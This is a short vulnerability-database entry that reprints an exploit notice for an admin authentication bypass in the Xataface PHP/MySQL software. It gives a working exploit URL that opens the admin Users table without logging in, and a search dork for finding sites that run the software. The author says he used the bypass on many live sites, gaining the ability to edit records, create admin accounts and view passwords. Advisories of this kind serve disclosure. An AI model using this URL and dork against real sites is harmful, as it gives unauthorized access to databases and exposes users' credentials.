Xataface Admin Auth Bypass Vulnerability

2014-07-01T00:00:00
ID SSV:68008
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : admin@firewire-security.com

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, MySQL database software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites I tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this I could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.




#[+] Greetz        :firewire-security team, b10h4z4rd, g3org3